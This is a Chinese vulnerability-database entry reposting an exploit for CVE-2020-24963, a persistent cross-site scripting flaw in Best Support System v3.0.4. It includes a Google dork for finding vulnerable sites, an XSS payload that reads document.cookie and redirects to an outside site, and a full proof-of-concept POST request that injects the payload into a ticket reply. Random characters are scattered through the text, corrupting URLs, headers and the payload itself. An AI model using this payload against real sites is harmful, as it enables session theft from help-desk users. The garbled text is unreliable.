Best Support System v3.0.4 – Authenticated Persistent XSS – CXSecurity.com

漏洞ID 2145288 漏洞
发布时间 2020-09-05 更新时间 2020-09-05
CVE编号 CVE-2020-24963

CNNVD-ID N/A
漏洞平台 N/A CVSS评分 N/A
漏洞来源
https://cxsecurity.com/issue/W& j 6 S Y x g I 8LB-2020090026
漏洞详情
漏洞细节尚未披露
漏洞EXP
[+] :: Exploit Title: Best Support System v3.0.4 - AuthenticatedP @ v 1 Persistent XSS
[+] :: Google Dork: "Powered By Best Support System"
[+] :: Date: 2020-08-23
[+] ::I 5 9 P j x 8 Exploit Author: Ex.Mi [ https://ex-mi.ru ]
[+] :: Vendor: Appsbd [ https://appsbd.com ]
[+] :: Software Version: 3.0.4
[+] :: Software Link: https:b 4 8//codecanyon.net/item/best-support-systK * X 9 a p b aemclient-support-desk-help-centrew ? 6 x / `/21357317
[+] :y { n = t K { M I: T@ U D U U + zested on: Ka- u 2li Linux
[+z s . @ Q ~] :: CVE: CVE-2020-24963
[+] :: CWE: CWE-79
[i] :: Info:
An Authenticated Persistent XSS vulnerability was] } L w a Z : F p discovered in the Best Support System, tested version — v3.0.4.
[$] :: Payload:
13"-->">'` --K Y I G J `<!--<` r H G j 6img src="htt5 k # x  Ops://www.anquanke.com/vul/id/2145288/--><@ j } 5;img src=x onerror=(alert)(`Ex.Mi`);(alert)(documentU 1 C y ] V.cookie);location=`https://ex-mi.ru`;>%0A[!] :: PoC (Burp Suite POST request):%0APOST /support-system/ticket-confirm/ticket-reply/11.html HTTP/1.1%0AHost: demo.appsbd.com%0AContent-Type: application/x-www-form-urlencoded; cm | w ? : bharset=UTF-8%0AX-Requested-With: XMLHttpRequest%0AContent-Length: 350%0AOrigin: https://demo.appsbd.co* O H 8 y ? ?m%0AConnection: close%0AReferer: https://demo.appsbd.com/support-sa , * { H ystem/ticket/details/11.html%0ACookie: [cov K Uokies_here]%0Al T X ? K d Tapp_form=8d1c319d5826a789b3cu [ , 2 1 Wa3e71516b0c5c&ticket_body=%3Cp%3E%3CV { 4 z {br%3E%3C%2Fp%3E13%22--%26gt%3B%22%26gt%3y - 4 i  Z t 2B'%60+--+%60%3C!-7  B v M B  }-%3Cimg+sr0 _ z D l G & j hc%3D%22--%3E%3Cimg+src%3D%22x%22v ` j x q C U L+onerror%3D%22(alert)(%60Ex_} K ( { b ]Mi%60)%3B(alert)(document.cookie)%3Blocation%3D%60https%3A%2F%2Fex-mi.ru%60%3B%22%3E&status=&app_form_ajax=ad1ce2b2c3eb943efaa8c239ff53acc2
[+] :: ContactsF M v * r j %:
Website: ex-mi.ru
Telegram: @ex_mi= S ! 7 T * i
GitHub: @ex-mi
Medium: @ex.mi